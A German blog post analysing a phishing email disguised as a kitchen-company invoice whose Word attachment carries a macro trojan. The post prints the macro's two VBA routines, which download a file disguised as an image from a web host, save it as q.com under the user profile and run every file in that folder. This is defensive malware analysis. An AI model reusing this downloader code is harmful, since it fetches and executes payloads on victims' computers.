[vgwort line=“59″ server=“vg05″ openid=“7ec146beb885402bb644041036637d36″]
[tawarning] Die MS-Word Dokumente scheinen sich einer neuen Beliebtheit als Viren und Trojanerschleuder zu erfreuen. Heute fand ich zwei E-Mails mit einer anderen Variante im Postfach. Der Text der E-Mails ist minimal:
Die E-Mail
From: „Viktoria Thies“ <warenrechung@kuechen-vogt.de>
To: „thomas@example.com“ <thomas@example.com>
Subject: inhumanly
—
Viktoria Thies
inhumanly.doc
Die E-Mail-Adresse stimmt mit dem in der Mail genannten Absender überein. Offensichtlich soll der Anschein erweckt werden, dass diese Mail eine Rechnung der Firma Küchen Vogt ist. Der Betreff entspricht dem Dateinamen des Anhanges ohne Erweiterung; dies passt meines Erachtens nicht zu einer Rechnung. Kunden der Firma könnten allerdings auf diesen Schwindel herein fallen. In Zusammenhang mit Küchen Vogt habe ich allerdings keine Viktoria Thies gefunden, aber wer kennt schon die Namen der Damen im Hintergrund oder der Verkäufer. Kaum eine Firma leistet es sich heute noch Mails ohne Disclaimer und Impressum zu schicken.
und ihr Anhang
Der Anhang ist ein MS-Word Dokument mit Makro-Code. Im Zeichen der Codesicherheit sollte dieses Prinzip wenig Erfolg versprechend sein, dass es dennoch genutzt wird, zeigt dass das Gegenteil wohl der Fall ist.
Das Grundprinzip des Trojaner entspricht dem bereits bekannten Trojaner, der Code ist jedoch anders. Der Programmierer hat darauf verzichtet, die Variablennamen zu obfuskieren (verschleiern).
Kern sind die Subroutinen h und m. Die Subroutine Base64_Encode wird nicht verwendet, daher habe ich sie hier weg gelassen. Auch das schmückende Beiwerk zum Autostart habe ich entfernt.
Subroutine h
Sub h()
Set oShell = CreateObject("WScript.Shell")
strH = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
Dim sDir: sDir = strH & "\q"
Set fso = CreateObject("Scripting.FileSystemObject")
If (fso.FolderExists(sDir)) Then
Else
Set oFSO = CreateObject("Scripting.FileSystemObject")
oFSO.CreateFolder sDir
End If
Dim xHttp: Set xHttp = CreateObject("MSXML2.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://example.com/images/img-0001.jpg", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile strH & "\q\q.com", 2
End With
Call m(sDir)
End Sub
Die Subroutine h erstellt ein Verzeichnis %USERPROFILES%\q und speichert darin ein als Bild getarntes Programm, das aus dem Internet herunter geladen wird, unter dem Namen %USERPROFILES%\q\q.com ab. Anschließend wird die Subroutine m aufgerufen.
Subroutine m
Function m(str11)
Dim fso, f, fc, f1, strF, intFiles
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
strF = ""
Set fso = CreateObject("Scripting.FileSystemObject")
If (fso.FolderExists(str11)) Then
Set f = fso.GetFolder(str11)
Set fc = f.Files
For Each f1 In fc
Dim fR
fR = str11 & "\" & f1.Name
WshShell.Run Chr(34) & fR & Chr(34), 1, True
Next
Set f1 = Nothing
Set fc = Nothing
Set f = Nothing
End If
Set fso = Nothing
End Function
Die Subroutine h startet alle Dateien, die in dem Verzeichnis %USERPROFILES%\q liegen, unabhängig davon, ob es sich um ein Programm handelt oder nicht. Eigentlich ein überflüssiges Verhalten. Falls der Ordner noch nicht existierte, sollte hier allerdings nur der Trojaner liegen. Warum das Makro auf das Ende des gestarteten Programmes wartet, ist mir schleierhaft. Notwendig wäre es meines Erachtens nicht.
Der Code des Subroutine m ist zwar sauber formatiert, aber nicht ganz optimal. Die Variable strF wird nicht benötigt; vielleicht hatte sie in einer früheren Version der Routine einen Zweck.
Wer weiß, wo der Programmierer den Code geklaut hat.
weitere Mails
Eine weiteren Mail war von Hans-Christof Schuch <warenrechung@infoloft.de>. Hier heißt der Anhang packets.coc. Auch infoloft.de ist eine existierende Domain, die jedoch zur Zeit nur eine leere Seite ausliefert. Andere Dokument sind auf den Server allerdings erreichbar.
Fazit
Wer auf seiner Festplatte unter seinen Dateien ein Verzeichnis \q mit einem Programm q.com findet, dürfte ein keines Problem haben.
[…] Subroutinen des Trojaners ist stärker obfuskiert als bei den bisherigen Makro_Trojaner. Sogar der Text des Dokumentes wird am Ende geändert. Im Kern wird recht umständlich nach einem […]